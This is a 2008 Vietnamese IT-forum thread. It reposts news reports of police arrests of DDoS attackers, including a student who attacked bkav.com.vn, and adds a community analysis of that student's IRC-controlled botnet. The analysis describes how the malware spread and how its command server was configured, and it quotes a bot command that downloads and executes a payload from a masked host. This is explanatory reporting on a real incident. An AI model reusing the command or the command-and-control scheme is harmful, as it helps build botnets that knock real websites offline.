๑๑۩۞۩๑๑ DIỄN ĐÀN CÔNG NGHỆ THÔNG TIN ๑๑۩۞۩๑๑

Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.

Đăng Nhập

Quên mật khẩu

Latest topics

» █Kiếm thế Cát Tư Hãn open: 10h00 sáng CN ngày 4/2/18 – Miễn phí sét Hoàng Kim
by ciuem Thu Feb 01, 2018 1:37 pm

» █TL VÕ Thiên Long (CS) Open 10h00 sáng CN ngày 4/2/18 - Test 7h30 tối T5 ngày 1/2/2018
by ciuem Thu Feb 01, 2018 1:34 pm

» █Kiếm thế Võ Thiên open: 10h00 sáng CN ngày 28/1/2018 – Sân chơi đẳng cấp miễn phí
by ciuem Sun Jan 28, 2018 8:52 am

» █TL VÕ Thiên Long (CS) Open 7h30 tối T4 ngày 20/12/17 - Test 7h30 tối CN ngày 17/12/2017
by ciuem Mon Dec 18, 2017 6:32 pm

» █Kiếm thế Võ Thiên open: 7H30 tối T 4 ngày 20/12/2017 – Sân chơi đẳng cấp miễn phí
by ciuem Mon Dec 18, 2017 6:29 pm

» █ TL Chúa Tể(CC) open 7h30 tối T4 ngày 13/12/17 - Test game: 7h30 tối CN 10/12- Treo máy nhận ĐT
by ciuem Sun Dec 10, 2017 11:29 am

» █Kiếm Thế Quách Tĩnh - Open 7h30 tối T4 ngày 13/12/2017 - Miễn phí sét Hoàng Kim
by ciuem Sat Dec 09, 2017 2:40 pm

» █Kiếm thế Lâm Xung open: 7h30 tối T5 ngày 7/12/17 – Miễn phí sét Hoàng Kim
by ciuem Sun Dec 03, 2017 1:07 pm

» █Kiếm thế Thanh Gươm- Open 7h30 tối T4 ngày 29/11/2017 - Miễn phí 100%
by ciuem Tue Nov 28, 2017 5:08 am

» █Kiếm Thế Xích Quỷ - Open 7h30 tối T4 ngày 15/11/2017 - Miễn phí sét Hoàng Kim
by ciuem Tue Nov 14, 2017 7:10 pm

» █Kiếm thế Lỗ Trí Thâm open: 7h30 tối T4 ngày 8/11/2017 Sân chơi dành cho game thủ ít thời gian cầy cuốc
by ciuem Sun Nov 05, 2017 6:52 pm

» █Kiếm Thế Xích Quỷ - Open 10h00 sáng CN ngày 5/11/2017 - Miễn phí sét Hoàng Kim
by ciuem Tue Oct 31, 2017 2:15 pm

Top posters

natasada (272)
C15 bắt giữ một đối tượng tấn công DDoS I_vote_lcapC15 bắt giữ một đối tượng tấn công DDoS I_voting_barC15 bắt giữ một đối tượng tấn công DDoS I_vote_rcap 
ciuem (127)
C15 bắt giữ một đối tượng tấn công DDoS I_vote_lcapC15 bắt giữ một đối tượng tấn công DDoS I_voting_barC15 bắt giữ một đối tượng tấn công DDoS I_vote_rcap 
binhheo (114)
C15 bắt giữ một đối tượng tấn công DDoS I_vote_lcapC15 bắt giữ một đối tượng tấn công DDoS I_voting_barC15 bắt giữ một đối tượng tấn công DDoS I_vote_rcap 
QuangPhuong (110)
C15 bắt giữ một đối tượng tấn công DDoS I_vote_lcapC15 bắt giữ một đối tượng tấn công DDoS I_voting_barC15 bắt giữ một đối tượng tấn công DDoS I_vote_rcap 
DragonIT (101)
C15 bắt giữ một đối tượng tấn công DDoS I_vote_lcapC15 bắt giữ một đối tượng tấn công DDoS I_voting_barC15 bắt giữ một đối tượng tấn công DDoS I_vote_rcap 
Tùng Nguyên (62)
C15 bắt giữ một đối tượng tấn công DDoS I_vote_lcapC15 bắt giữ một đối tượng tấn công DDoS I_voting_barC15 bắt giữ một đối tượng tấn công DDoS I_vote_rcap 
Pho Minh Chu (45)
C15 bắt giữ một đối tượng tấn công DDoS I_vote_lcapC15 bắt giữ một đối tượng tấn công DDoS I_voting_barC15 bắt giữ một đối tượng tấn công DDoS I_vote_rcap 
vanvan11 (37)
C15 bắt giữ một đối tượng tấn công DDoS I_vote_lcapC15 bắt giữ một đối tượng tấn công DDoS I_voting_barC15 bắt giữ một đối tượng tấn công DDoS I_vote_rcap 
tuanpc (27)
C15 bắt giữ một đối tượng tấn công DDoS I_vote_lcapC15 bắt giữ một đối tượng tấn công DDoS I_voting_barC15 bắt giữ một đối tượng tấn công DDoS I_vote_rcap 
xentoc111 (25)
C15 bắt giữ một đối tượng tấn công DDoS I_vote_lcapC15 bắt giữ một đối tượng tấn công DDoS I_voting_barC15 bắt giữ một đối tượng tấn công DDoS I_vote_rcap 

Ngôn ngữ

November 2024

MonTueWedThuFriSatSun
    123
45678910
11121314151617
18192021222324
252627282930 

Calendar Calendar

Poll

Bạn thích nhất tên miền nào của Diễn Đàn 06CNTT ?
C15 bắt giữ một đối tượng tấn công DDoS I_vote_lcap0%C15 bắt giữ một đối tượng tấn công DDoS I_vote_rcap 0% [ 0 ]
C15 bắt giữ một đối tượng tấn công DDoS I_vote_lcap14%C15 bắt giữ một đối tượng tấn công DDoS I_vote_rcap 14% [ 1 ]
C15 bắt giữ một đối tượng tấn công DDoS I_vote_lcap71%C15 bắt giữ một đối tượng tấn công DDoS I_vote_rcap 71% [ 5 ]
C15 bắt giữ một đối tượng tấn công DDoS I_vote_lcap0%C15 bắt giữ một đối tượng tấn công DDoS I_vote_rcap 0% [ 0 ]
C15 bắt giữ một đối tượng tấn công DDoS I_vote_lcap14%C15 bắt giữ một đối tượng tấn công DDoS I_vote_rcap 14% [ 1 ]
C15 bắt giữ một đối tượng tấn công DDoS I_vote_lcap0%C15 bắt giữ một đối tượng tấn công DDoS I_vote_rcap 0% [ 0 ]

Tổng số bầu chọn : 7

Đai Học Đà Nẵng

Thống Kê

Hiện có 232 người đang truy cập Diễn Đàn, gồm: 0 Thành viên, 0 Thành viên ẩn danh và 232 Khách viếng thăm

Không


[ View the whole list ]


Số người truy cập cùng lúc nhiều nhất là 289 người, vào ngày Mon Oct 28, 2024 12:20 am

RSS feeds


Yahoo! 
MSN 
AOL 
Netvibes 
Bloglines 

Keywords


    C15 bắt giữ một đối tượng tấn công DDoS

    QuangPhuong
    QuangPhuong
    Admin


    Tổng số bài gửi : 110
    Age : 37
    Địa chỉ : Lớp 06CNTT- Đại học sư phạm - Đại học Đà Nẵng
    Điểm thưởng cho đóng góp :
    C15 bắt giữ một đối tượng tấn công DDoS Left_bar_bleue99 / 10099 / 100C15 bắt giữ một đối tượng tấn công DDoS Right_bar_bleue

    Registration date : 18/09/2008

    C15 bắt giữ một đối tượng tấn công DDoS Empty C15 bắt giữ một đối tượng tấn công DDoS

    Bài gửi by QuangPhuong Mon Oct 06, 2008 8:59 pm

    (VietNamNet) - Đơn vị Phòng chống tội phạm công nghệ cao C15 - Bộ công an vừa tiến hành bắt giữ một số đối tượng liên quan đến tội phạm công nghệ cao: tấn công từ chối dịch vụ (DDoS) có chủ đích vào hệ thống máy chủ của công ty Nhân Hòa (Hà Nội).
    Tấn công DDOS bằng xflash có sức phá hoại không thể chống đỡ!


    C15 bắt giữ một đối tượng tấn công DDoS Images1053029_Xflash
    Ông Trần Văn Hòa - trưởng đơn vị Phòng chống tội phạm công nghệ cao C15 (Bộ Công an) khẳng định, trong buổi sáng hôm nay - 31/7/2006 - C15 đã tiến hành bắt giữ một đối tượng ở Bắc Ninh, sau khi có bằng chứng xác đáng về việc người này cùng một số đối tượng khác liên tục tấn công từ chối dịch vụ (DDoS) với ý đồ xấu vào hệ thống máy chủ của công ty Nhân Hòa - (Công ty cung cấp dịch vụ Hosting và Domain có trụ sở tại Hà Nội).
    Vụ việc nói trên đã được C15 âm thầm tiến hành điều tra hơn một tháng nay. Cho đến hiện tại, dù đã có những bằng chứng xác đáng, C15 vẫn chưa công bố tên tuổi và các hình thức xử lý với đối tượng bị bắt, song họ khẳng định sẽ đưa ra các thông tin sau khi hoàn tất các thủ tục cần thiết.
    Ông Vũ Đức Trung - (giám đốc công ty Nhân Hòa - người viết lá đơn nhờ C15 vào cuộc điều tra) cho biết: Cách đây khoảng 4 tháng, các máy chủ của công ty ông bị tấn công từ chối dịch vụ liên tiếp một cách đáng ngờ.
    "Việc tấn công DDoS dữ dội vào các website ngẫu nhiên của khách hàng đặt trên server (máy chủ) của chúng tôi khiến toàn bộ hệ thống bị quá tải và làm chúng tôi ngày càng mất dần khách hàng. Việc này ảnh hưởng nghiêm trọng đến số lượng khách hàng, chất lượng phục vụ và uy tín của công ty" - Ông Trung nói.
    Khi bị tấn công từ chối dịch vụ phân tán, các dữ liệu ảo sẽ được gửi liên tục từ khắp nơi trên mạng tới hệ thống máy tính nạn nhân, khiến website không thể hoạt động vì quá tải.
    C15 bắt giữ một đối tượng tấn công DDoS Images1053113_ddos
    Sau khi theo dõi và "chịu đựng" một thời gian dài, ông Trung cho rằng công ty của mình đang bị tấn công một cách có chủ đích: "Rất có thể là một sự cạnh tranh không lành mạnh từ một công ty kinh doanh dịch vụ tương tự". Từ đó ông Trung bắt đầu theo dõi - ghi lại các diễn biến của từng đợt tấn công và gửi file log sang trung tâm An ninh mạng BKIS - ĐH Bách Khoa HN nhờ đơn vị này giúp đỡ.
    "Trong quyền hạn của mình, BKIS chỉ có thể tìm ra các đầu mối, các thông tin liên quan có giá trị, sau đó chúng tôi khuyên Nhân Hòa hãy nộp đơn cho C15 - Đơn vị này mới có đủ thẩm quyền điều tra." - Ông Nguyễn Tử Quảng - giám đốc trung tâm BKIS cho biết.
    Với sự vào cuộc đầy quyết tâm của C15 cùng với sự phối hợp của BKIS, vụ việc đã được đưa ra ánh sáng. Theo ông Quảng, ở Việt Nam hiện tại có hai hình thức tấn công từ chối dịch vụ khiến nhiều người đau đầu: Sử dụng mạng Botnet và tấn công Xflash.
    Trước đây C15 cũng từng xử lý một vụ việc điển hình, bắt giữ đối tượng Nguyễn Thành Công (DantruongX) vì đã tấn công từ chối dịch vụ gây thiệt hại vào hệ thống website TMĐT của công ty VietCo. Khi đó DantruongX sử dụng mạng Botnet để tấn công, còn hình thái mà nhóm DDoSer lần này sử dụng tấn công Nhân Hòa là XFlash.
    Thực ra thì cả hai hình thái DDoS này đều rất ác ý và có sức hủy diệt lớn đối với các hệ thống thông tin. "Không chỉ VietCo và Nhân Hòa, theo tôi được biết thì hầu hết các hệ thống thông tin và thương mại điện tử ở Việt Nam đều đang bị DDoS quấy rối. Những động thái xử lý răn đe của pháp luật vào lúc này theo tôi là rất cần thiết!" - Ông Quảng kết luận.

    VietNamNet sẽ cập nhật các thông tin thêm về vụ việc này đến bạn đọc.

    * Thế Phong
    QuangPhuong
    QuangPhuong
    Admin


    Tổng số bài gửi : 110
    Age : 37
    Địa chỉ : Lớp 06CNTT- Đại học sư phạm - Đại học Đà Nẵng
    Điểm thưởng cho đóng góp :
    C15 bắt giữ một đối tượng tấn công DDoS Left_bar_bleue99 / 10099 / 100C15 bắt giữ một đối tượng tấn công DDoS Right_bar_bleue

    Registration date : 18/09/2008

    C15 bắt giữ một đối tượng tấn công DDoS Empty Thủ phạm tấn công BKIS là một học sinh

    Bài gửi by QuangPhuong Sat Oct 11, 2008 11:07 am

    Thủ phạm của các vụ tấn công từ chối dịch vụ (DDOS) nhắm vào một loạt các trang web trong nước từ 5 - 9.10 vừa qua đã bị cơ quan chức năng bắt sáng 10.10 tại Quảng Nam(Ha.ha.... cùng quê với mình.) Wink
    Phải học hỏi thôi!
    C15 bắt giữ một đối tượng tấn công DDoS 3hhjdgdpa20388396
    Phần mã botnet tấn công DDOS sau khi dịch ngược
    - Ảnh do BKIS cung cấp

    3 website bị tấn công

    Từ khoảng 9 giờ sáng ngày 5.10, trên mạng internet đã xuất hiện thông tin cho rằng đang có một cuộc tấn công DDOS (tấn công từ chối dịch vụ) nhằm vào một số website tại Việt Nam. Theo diễn đàn an ninh mạng Vietnam Security đã có ít nhất từ 3.000 - 5.000 máy tính ma (botnet) được huy động cho các cuộc tấn công này và trong số các website bị tấn công ngoài 5giay.vn; nhatnghe.com còn có cả website của Trung tâm an ninh mạng BKIS. Tuy nhiên đại diện của BKIS đã không xác nhận thông tin này.

    Trả lời báo chí ông Vũ Ngọc Sơn - Trưởng phòng virus an ninh mạng của BKIS đã cho biết nguyên nhân việc website của BKIS bị gián đoạn là do một số trục trặc trong quá trình nâng cấp hệ thống. Theo ông Nguyễn Tử Quảng, Giám đốc BKIS, ngày 5.10 sau khi một số tờ báo, diễn đàn và blog đưa tin về việc BKIS bị tấn công DDOS, BKIS đã xác định sớm muộn tin tặc cũng sẽ đánh BKIS để "thể hiện đẳng cấp" và đã quyết định giăng bẫy với tin tặc này.

    Một chuyên gia về an ninh mạng không muốn nêu tên cho biết, hiện nay tấn công DDOS trên thực tế đã hầu như không còn được giới hacker trên thế giới quan tâm, không phát triển kỹ thuật, công cụ nữa vì kỹ thuật tấn công này đã phát triển tới mức tối đa và không còn điều gì lý thú đáng để khám phá. DDOS hiện nay chủ yếu là vũ khí của dân "giang hồ mạng". Theo chuyên gia này nhiều website của các công ty phòng chống virus lớn, Bộ Quốc phòng Mỹ mặc dù được bảo mật rất cẩn thận vẫn bị tấn công DDOS và gây tê liệt trong một thời gian.

    Đúng như dự kiến, tin tặc này sau đó đã tấn công vào website của BKIS, mọi đường đi nước bước đã bị ghi lại dấu vết. Ông Quảng cho biết sau khi thông tin website của BKIS cũng bị DDOS tê liệt trong 5.10 và 8.10 được lan truyền, tại một diễn đàn của giới hacker, P. (tên của thủ phạm), đã nhận mình là tác giả của các vụ tấn công trên và tuyên bố có thể đánh sập bất cứ website nào nếu muốn. Theo ông Quảng, việc truy cập vào bkav.com.vn gặp trục trặc trong ngày 8.10 là do BKIS đã dựng lên một hệ thống phòng thủ để đón lõng tin tặc. "Với cơ chế này, khi ai đó truy cập vào website của BKIS nếu như refresh liên tục sẽ bị chặn IP, đây là giải pháp tình thế chúng tôi phải thực hiện để ngăn chặn tấn công vì việc refresh liên tục sẽ được hiểu như một hành động bất thường và rất có thể là việc tấn công của cơ chế DDOS", ông Quảng nói.

    Phạm tội vì thiếu hiểu biết


    Sau 20 giờ đồng hồ phối hợp và quyết liệt điều tra, Phòng Phòng chống tội phạm công nghệ cao (C15 - Bộ Công an) và Trung tâm An ninh mạng BKIS đã xác định được thủ phạm là một học sinh THPT ở Quảng Nam. Chiều 9.10 các điều tra viên của C15 đã đáp chuyến bay khẩn cấp để có mặt tại khu vực thủ phạm đang sinh sống. Sáng 10.10 các đơn vị điều tra đã phối hợp cùng PC15 địa phương bắt giữ thủ phạm tại nhà cùng tang vật là chiếc máy tính cá nhân người này dùng để gây ra các vụ tấn công.

    Kết quả điều tra cho thấy, học sinh này đã huy động bạn bè đi cài đặt virus tại các cửa hàng game, internet công cộng. Từ đây, virus tiếp tục phát tán qua USB. Bằng cách này, thủ phạm đã tạo dựng được một mạng botnet với khoảng 1.000 máy tính ma. Đây chính là công cụ để thực hiện tấn công DDOS vào một số website. Trước những bằng chứng không thể chối cãi, thủ phạm đã thừa nhận hành vi vi phạm.

    Ông Nguyễn Tử Quảng, Giám đốc BKIS từ chối tiết lộ chi tiết về thủ phạm và cho biết đây có lẽ chỉ là hành động bộc phát do tin tặc thiếu hiểu biết và chưa nhận thức được đầy đủ vấn đề mình gây ra.

    Theo thượng tá Trần Văn Hòa, Trưởng phòng Phòng chống tội phạm công nghệ cao C15 các vụ vi phạm trên mạng có dấu hiệu xuất hiện trở lại trong thời gian gần đây. "Tháng 11 tới, Quốc hội sẽ thông qua dự thảo Bộ luật Hình sự sửa đổi. Tội cố ý phát tán chương trình tin học có tính năng gây hại, điều khiển bất hợp pháp máy tính, mạng máy tính, làm mất khả năng hoạt động của mạng máy tính gây hậu quả nghiêm trọng sẽ bị phạt tiền từ 20 triệu đồng đến 200 triệu đồng hoặc bị phạt tù từ 1-5 năm", thượng tá Trần Văn Hòa cho biết.
    T.Sơn(Thanhnien.com.vn)
    QuangPhuong
    QuangPhuong
    Admin


    Tổng số bài gửi : 110
    Age : 37
    Địa chỉ : Lớp 06CNTT- Đại học sư phạm - Đại học Đà Nẵng
    Điểm thưởng cho đóng góp :
    C15 bắt giữ một đối tượng tấn công DDoS Left_bar_bleue99 / 10099 / 100C15 bắt giữ một đối tượng tấn công DDoS Right_bar_bleue

    Registration date : 18/09/2008

    C15 bắt giữ một đối tượng tấn công DDoS Empty Theo tin từ HVAonline!

    Bài gửi by QuangPhuong Sat Oct 11, 2008 5:12 pm

    Kẻ tấn công vừa bị bắt theo thông tin trên báo là một học sinh trung học ở Quảng Nam. Vậy làm sao một học sinh trung học có thể huy động nhiều máy tính để tấn công được BKAV.com.vn, chúng ta sẽ cùng nhau phân tích:

    Nhận thông tin:
    Vào ngày chủ nhật 5/10/2008 khi đang ở nhà, tôi truy cập vào trang bkav.com.vn để down phần mềm diệt virus về diệt virus cho máy laptop người thân, tuy nhiên tôi không thể nào truy cập vào trang bkav.com.vn. Một lát sau tôi liên tục nhận được thông tin website http://www.bkav.com.vn bị tấn công botnet, đến chiều hôm đó tôi đăng tin lên trang http://vietnamsecurity.googlepages.com, ngày hôm sau các báo bắt đầu đăng tin và phỏng vấn BKIS về vụ việc tuy nhiên bkis đã phủ nhận tất cả thông tin và đính chính là vụ việc trên chỉ là hoạt động nâng cấp thường nhật của BKAV.

    Sau đây là những hình ảnh chụp được ngày 5/10:
    C15 bắt giữ một đối tượng tấn công DDoS Bkavek1
    Tuy nhiên, tôi vẫn tiếp tục nhận được thông tin bkav bị ddos, website bkav.com.vn tiếp tục hoạt động chập chờn và thậm chí có lúc không truy cập vào được trong thời gian dài! đến lúc này thì thông báo việc nâng cấp của bkav không còn hợp lý nữa, nó củng cố thêm thông tin cho là bkav.com.vn bị tấn công botnet. Sau đây là những hình ảnh cập nhật sau đó:

    Đồng thời vào 17h ngày 7/10 tôi lại nhận được những hình ảnh chụp màn hình được cho là hình ảnh tấn công trang bkav.com.vn và một file có tên là BKAV.exe ( được cho là file tấn công bkav.exe)
    C15 bắt giữ một đối tượng tấn công DDoS Bkis1

    Đồng thời trên mạng cũng xuất hiện các thông tin cho rằng có một người đã dùng các chèn mã độc vào các bản crack BKAV pro, các bản auto game và chèn iframe vào các website lớn để từ đó xây dựng mạng botnet để tấn công http://www.bkav.com.vn

    Tìm thông tin

    Sau khi nhận thông tin và phản hồi từ các báo chí và bạn bè, tôi tiến hành điều tra sự việc!

    Tôi tìm bắt tìm thông tin về các hacker hay sử dụng botnet, các loại botnet phổ biến ở Việt Nam, tìm các các diễn đàn lớn đã bị tấn công trong thời gian qua để tìm manh mối! đồng thời nhờ người có kinh nghiệm tiến hành thử nghiệm và phân tích cơ chế hoạt động của của file BKAV.exe.

    Kết quả là tôi cũng tìm được một số manh mối:

    Sau khi phân tích file BKAV.exe cho thấy đây là một loại virus nội, đã được đưa vào danh sách virus của BKAV, thông tin thêm:

    http://bkav.com.vn/thong_tin_virus/13/08/2008/3/1755/
    đồng thời tìm kiếm trên các forum lớn, tôi tìm được các thông tin sau:
    đây là đoạn mã chèn file vào website, cụ thể ở đây là 4gamevn.com, cơ chế của nó là tự download file trojan.exe về máy người dùng và thực thi. Thông tin này càng lý giải cho việc làm sao một học sinh trung học có thể xây dựng một mạng lưới bot net với tầm hơn 100 ngàn victim!

    Sau khi download file trojan.exe về, tôi tíên hành dịch ngược và may mắn có được email của người viết con trojan này! Tuy nhiên vẫn chưa có được chứng cứ cụ thể về vụ việc tấn công BKAV. Từ địa chỉ email đó tôi bắt đầu tìm được những thông tin cá nhân của kẻ tấn công, hình ảnh, các forum người này tham gia! nó có email là: Linh_XXX@yahoo.com , từ đó tôi vào blog, đồng thời cũng biết được níck trên mạng của kẻ đó là LLY. . ., một tay chơi botnet còn khá nhỏ tuổi ở Việt Nam, tôi bắt đầu tìm hiểu cách xây dựng mạng Botnet của Lly. . .

    Câu chuyện hé mở:

    Qua tìm hiểu cho thấy kẻ tấn công còn trẻ tuy nhiên có sự nghiên cứu về botnet, cc chùa, và biết lập trình!

    Lly… đã viết cho mình một chương trình botnet mới dựa trên nền tảng mIRC để điều khiển các victim. Sau đó lly… đã cài con virus này vào các chương trình chơi auto game, chương trình crack Bkpro (chưa tìm ra phiên bản để kiểm chứng), đồng thời dựa vào các mối quan hệ với các tay chơi botnet khác kiếm shell trên các diễn đàn lớn, đông lựơt truy cập để cài iframe vào các diễn đàn đó, thậm chí có thể lly đã cài vào chính diễn đàn về âm nhạc và giải trí mà lly đang quản lý!

    Sau khi victim bị nhiễm vào máy sẽ thự động nhận lệnh từ một file có trên website của kẻ tấn công: http://www.xxx.net/server/php nội dung của file này có dạng như sau:

    [Server] server=irc. port=6667 chan=#zz ver=3 IP=58.xxx.xxx.xxx

    với các thông số:

    Server: đây là server irc để victim connect vào! vậy tại sao ở đây chỉ là irc? Đó chính là vì kẻ tấn công muốn bình thường victim không thể connect tới server được, khi nào kẻ tấn công chỉnh lại file server.php thì victim mới connect vào!

    Port:6667 là port mặt định của IRC

    Chan: đây là room mà kẻ tấn công sẽ tạo ra để điều khiển các victim

    Ver=3: là version của virus botnet này, có nó chức năng tự động cập nhật khi phiên bản trong máy victim cũ!

    IP=58.xxx.xxx.xxx: đây là ip của kẻ tấn công

    Sau khi nhận lệnh từ file server.php, máy của vitim sẽ tự động connect tới server IRC.nhac…..vn và join vào room ZZ

    Kẻ tấn công đã khéo léo viết chương trình botnet nhận lệnh từ mIRC

    Cấu trúc câu lệnh như sau:

    !lly… download http://www.xxx.vn/bkav.exe c:\a.exe 1

    Ý nghĩa của nó là sẽ tự động download file bkav.exe từ server về máy victim và tự động thực thi! File bkav.exe có nhiệm vụ là ghi vào regstry những biến để liên tục ping đến server bkav.exe gây ra cuộc tấn công từ chối dịch vụ!

    vậy khi cần thực hiện cuộc tấn công, lly.. chỉ cần connect vào mạng mIRC và gõ vài câu lệnh!
    Từ hackerbinhphuoc.

    Sponsored content


    C15 bắt giữ một đối tượng tấn công DDoS Empty Re: C15 bắt giữ một đối tượng tấn công DDoS

    Bài gửi by Sponsored content


      Hôm nay: Sun Nov 03, 2024 12:36 am